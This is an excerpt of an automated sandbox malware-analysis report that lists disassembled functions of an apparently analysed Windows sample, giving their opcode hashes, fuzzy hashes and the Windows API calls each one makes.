                                                                                                                                                • Opcode Fuzzy Hash: e24e684744892cb999e68bc9a394e1d636497ce5737135654e2b62d411632786
                                                                                                                                                • Instruction Fuzzy Hash: A831F778966383DFEB35EF34E84CBB637A8AB01700F140469E466860E0E7F496A5CB11
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0028CF38
                                                                                                                                                • InternetReadFile.WININET(?,00000000,?,?), ref: 0028CF6F
                                                                                                                                                • GetLastError.KERNEL32(?,00000000,?,?,?,0028C21E,00000000), ref: 0028CFB4
                                                                                                                                                • SetEvent.KERNEL32(?,?,00000000,?,?,?,0028C21E,00000000), ref: 0028CFC8
                                                                                                                                                • SetEvent.KERNEL32(?,?,00000000,?,?,?,0028C21E,00000000), ref: 0028CFF2
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3191363074-0
                                                                                                                                                • Opcode ID: 636d9bdd900d074fd89e1b12ca301f03f1c3593022c4d54dc3a0bbfab5f09728
                                                                                                                                                • Instruction ID: 8bee132f0aec724fd96ab2dc32485261586e8525289ff80af5cdcb6e593679ad
                                                                                                                                                • Opcode Fuzzy Hash: 636d9bdd900d074fd89e1b12ca301f03f1c3593022c4d54dc3a0bbfab5f09728
                                                                                                                                                • Instruction Fuzzy Hash: B2318475521206EFEB20EFA5D88496BB7F9EB14310B20442FF606D2591DB30AD50DB60
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SendMessageW.USER32(?,00001053,000000FF,?), ref: 002A5745
                                                                                                                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 002A579D
                                                                                                                                                • _wcslen.LIBCMT ref: 002A57AF
                                                                                                                                                • _wcslen.LIBCMT ref: 002A57BA
                                                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 002A5816
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$_wcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 763830540-0
                                                                                                                                                • Opcode ID: 7d2196626f22d91489fd13a5873a4e9d1be37fcc2b5b603d2dd7441baa1e3f2d
                                                                                                                                                • Instruction ID: 6e97ff82a54e0c3b48f0c7c5fc408676ed53cd3fc54ac77f67eb45fa27b98a4c
                                                                                                                                                • Opcode Fuzzy Hash: 7d2196626f22d91489fd13a5873a4e9d1be37fcc2b5b603d2dd7441baa1e3f2d
                                                                                                                                                • Instruction Fuzzy Hash: 87218471924629DBDB209F60DC84AEFB778FF46720F104156F919AA180DB7099A5CF90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • IsWindow.USER32(00000000), ref: 00290951
                                                                                                                                                • GetForegroundWindow.USER32 ref: 00290968
                                                                                                                                                • GetDC.USER32(00000000), ref: 002909A4
                                                                                                                                                • GetPixel.GDI32(00000000,?,00000003), ref: 002909B0
                                                                                                                                                • ReleaseDC.USER32(00000000,00000003), ref: 002909E8
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$ForegroundPixelRelease
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4156661090-0
                                                                                                                                                • Opcode ID: dde3cceb775b0fdd3b8dac9908a1b2836a86040309bb03793c34c09a7dd6e740
                                                                                                                                                • Instruction ID: 32eaa1a38ba0c2a5404cc9df0273e8dc1cd871455207573934a303605534569e
                                                                                                                                                • Opcode Fuzzy Hash: dde3cceb775b0fdd3b8dac9908a1b2836a86040309bb03793c34c09a7dd6e740
                                                                                                                                                • Instruction Fuzzy Hash: 51219635610204AFD704EF65D988AAEB7F9EF45700F148469F84AD7751DB70AC54CF50
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 0024CDC6
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0024CDE9
                                                                                                                                                  • Part of subcall function 00243820: RtlAllocateHeap.NTDLL(00000000,?,002E1444,?,0022FDF5,?,?,0021A976,00000010,002E1440,002113FC,?,002113C6,?,00211129), ref: 00243852
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0024CE0F
                                                                                                                                                • _free.LIBCMT ref: 0024CE22
                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0024CE31
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 336800556-0
                                                                                                                                                • Opcode ID: 9f6f7be38fa7e18606590e32c71e033c3d4d3bca15dbd26f5a79f88e4f0fa05a
                                                                                                                                                • Instruction ID: 84093caec43fca8bdc12963d45ed8a24f52a7a485faa5fd1d9b7a057ab42cac6
                                                                                                                                                • Opcode Fuzzy Hash: 9f6f7be38fa7e18606590e32c71e033c3d4d3bca15dbd26f5a79f88e4f0fa05a
                                                                                                                                                • Instruction Fuzzy Hash: D501D8727132157F27651ABE6C4CC7B696DDEC7BA13350129F905CB200DF618D2195B0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00229693
                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 002296A2
                                                                                                                                                • BeginPath.GDI32(?), ref: 002296B9
                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 002296E2
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3225163088-0
                                                                                                                                                • Opcode ID: 83c12099358ec3482d5deb54cf5e7e53f2353f2609ab27d48e62a5cad9a29c9b
                                                                                                                                                • Instruction ID: c267d2883f1ac15930189639d360ae584832dd4a21ca7b77b3e1dc95c8322211
                                                                                                                                                • Opcode Fuzzy Hash: 83c12099358ec3482d5deb54cf5e7e53f2353f2609ab27d48e62a5cad9a29c9b
                                                                                                                                                • Instruction Fuzzy Hash: D2217130861396EBDB119FA4FC4CBB97BA8BB01315F100225F414AA1A1D77498F5CF90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memcmp
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2931989736-0
                                                                                                                                                • Opcode ID: 77e8281120af5704fc75e4084abf6f9b8945f6ea3de1ba7eef0bec8a6027bd13
                                                                                                                                                • Instruction ID: 262b11b05f268d0f2b73d680df856a140468fe6dc1dfe334846d8b8d8a2b0d42
                                                                                                                                                • Opcode Fuzzy Hash: 77e8281120af5704fc75e4084abf6f9b8945f6ea3de1ba7eef0bec8a6027bd13
                                                                                                                                                • Instruction Fuzzy Hash: C501BEA16B1615FBD20C55119E82FBBF35D9B26364F008021FD0C5A141F7F5ED3086B0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetLastError.KERNEL32(?,?,?,0023F2DE,00243863,002E1444,?,0022FDF5,?,?,0021A976,00000010,002E1440,002113FC,?,002113C6), ref: 00242DFD
                                                                                                                                                • _free.LIBCMT ref: 00242E32
                                                                                                                                                • _free.LIBCMT ref: 00242E59
                                                                                                                                                • SetLastError.KERNEL32(00000000,00211129), ref: 00242E66
                                                                                                                                                • SetLastError.KERNEL32(00000000,00211129), ref: 00242E6F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLast$_free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3170660625-0
                                                                                                                                                • Opcode ID: f79051cfe69d2305947cd0ab5a96cf13e87c65dfdcd25a9963241d7b9d9f2cc5
                                                                                                                                                • Instruction ID: e0897034251e8dca9626df90875cca2a584f23b84ee20304369945afd61aecc0
                                                                                                                                                • Opcode Fuzzy Hash: f79051cfe69d2305947cd0ab5a96cf13e87c65dfdcd25a9963241d7b9d9f2cc5
                                                                                                                                                • Instruction Fuzzy Hash: B201F932775A02E7C61EAB377C89D2B2659EBD27A57F40025F815D2293EEB0DC394520
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • CLSIDFromProgID.OLE32 ref: 0027002B
                                                                                                                                                • ProgIDFromCLSID.OLE32(?,00000000), ref: 00270046
                                                                                                                                                • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0026FF41,80070057,?,?), ref: 00270054
                                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00270064
                                                                                                                                                • CLSIDFromString.OLE32(?,?), ref: 00270070
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3897988419-0
                                                                                                                                                • Opcode ID: a48d26c50e43790a3e14429adfe618399f2ebef9a4a0fe25e74ef1a6fa78dd1c
                                                                                                                                                • Instruction ID: 3b83e166ba43b9305e929888d525052f9229bd317f13f87fa361d231d33cf134
                                                                                                                                                • Opcode Fuzzy Hash: a48d26c50e43790a3e14429adfe618399f2ebef9a4a0fe25e74ef1a6fa78dd1c
                                                                                                                                                • Instruction Fuzzy Hash: A301A272610215FFDB114F68EC88BAA7AEDEF44761F248124F909D2210DB75DD549BA0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 0027E997
                                                                                                                                                • QueryPerformanceFrequency.KERNEL32(?), ref: 0027E9A5
                                                                                                                                                • Sleep.KERNEL32(00000000), ref: 0027E9AD
                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 0027E9B7
                                                                                                                                                • Sleep.KERNEL32 ref: 0027E9F3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2833360925-0
                                                                                                                                                • Opcode ID: 32642924dadd138573108f9735bd21b05302062e0ddddb357062a6155dd594d8
                                                                                                                                                • Instruction ID: 830d36f6181d061d4f75c64783362345109b39b212ab78cf46ae663d2a25f8f7
                                                                                                                                                • Opcode Fuzzy Hash: 32642924dadd138573108f9735bd21b05302062e0ddddb357062a6155dd594d8
                                                                                                                                                • Instruction Fuzzy Hash: 6A015B32D11529DBCF009FE4E84DADDBB78BF0E301F114596EA06B2241CB309565CB62
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00271114
                                                                                                                                                • GetLastError.KERNEL32(?,00000000,00000000,?,?,00270B9B,?,?,?), ref: 00271120
                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00270B9B,?,?,?), ref: 0027112F
                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00270B9B,?,?,?), ref: 00271136
                                                                                                                                                • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0027114D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 842720411-0
                                                                                                                                                • Opcode ID: 0edc4654a0be7e20e781c0510ddd8be1cbecafc823301c856a80f5a22de2674e
                                                                                                                                                • Instruction ID: 3a49bc3b137ac718f4a606138f383f07bb2a8b1d3bc115539cca783bbbfbab07
                                                                                                                                                • Opcode Fuzzy Hash: 0edc4654a0be7e20e781c0510ddd8be1cbecafc823301c856a80f5a22de2674e
                                                                                                                                                • Instruction Fuzzy Hash: 32011975200215BFDB114FA9EC4DA6A3B6EEF8A3A0B604469FA49D7360DE31DD109A60
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0027102A
                                                                                                                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00271036
                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00271045
                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0027104C
                                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00271062
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 44706859-0
                                                                                                                                                • Opcode ID: 12eb12cd31775a8b72ee2f2f895738ce3b01afab5b91958c5bbb09c6fb14ec99
                                                                                                                                                • Instruction ID: 65b5c3d4672a27ae75948a881523a391692afd383333d29eef8662d4143e4bda
                                                                                                                                                • Opcode Fuzzy Hash: 12eb12cd31775a8b72ee2f2f895738ce3b01afab5b91958c5bbb09c6fb14ec99
                                                                                                                                                • Instruction Fuzzy Hash: F8F06D35200312FBDB215FA8EC4DF563BADEF8A761F204424FE49C7250DE70D8608A60
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00270FCA
                                                                                                                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00270FD6
                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00270FE5
                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00270FEC
                                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00271002
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 44706859-0
                                                                                                                                                • Opcode ID: a5a6724a65bed132178d3ed591f122763b212e8b9185a2b84bf0e966de5ef529
                                                                                                                                                • Instruction ID: 5377f5ce8b9cb23cdc80d073ec82364728ca70ec87f5854fd1e7f4bd8fc3db5d
                                                                                                                                                • Opcode Fuzzy Hash: a5a6724a65bed132178d3ed591f122763b212e8b9185a2b84bf0e966de5ef529
                                                                                                                                                • Instruction Fuzzy Hash: 5CF04935200312EBDB215FA8AC4DF563BADEF8A762F204424FA49C6251DE70DC608A60
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                • Opcode ID: da46e07c3cfc67e2bc9c51c5fb139ffda944daae7ef6b60e68356a4f247150cc
                                                                                                                                                • Instruction ID: 0b424d8b8b9f26d9da40faa152d7e8551a84aec36eb6ad2e76718680dc48ab46
                                                                                                                                                • Opcode Fuzzy Hash: da46e07c3cfc67e2bc9c51c5fb139ffda944daae7ef6b60e68356a4f247150cc
                                                                                                                                                • Instruction Fuzzy Hash: 5601DC76802B029FCB30AF66D8C0806FBF9BE602053158A7ED19252971C7B0A968CF80
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • _free.LIBCMT ref: 0024D752
                                                                                                                                                  • Part of subcall function 002429C8: HeapFree.KERNEL32(00000000,00000000), ref: 002429DE
                                                                                                                                                  • Part of subcall function 002429C8: GetLastError.KERNEL32(00000000,?,0024D7D1,00000000,00000000,00000000,00000000,?,0024D7F8,00000000,00000007,00000000,?,0024DBF5,00000000,00000000), ref: 002429F0
                                                                                                                                                • _free.LIBCMT ref: 0024D764
                                                                                                                                                • _free.LIBCMT ref: 0024D776
                                                                                                                                                • _free.LIBCMT ref: 0024D788
                                                                                                                                                • _free.LIBCMT ref: 0024D79A
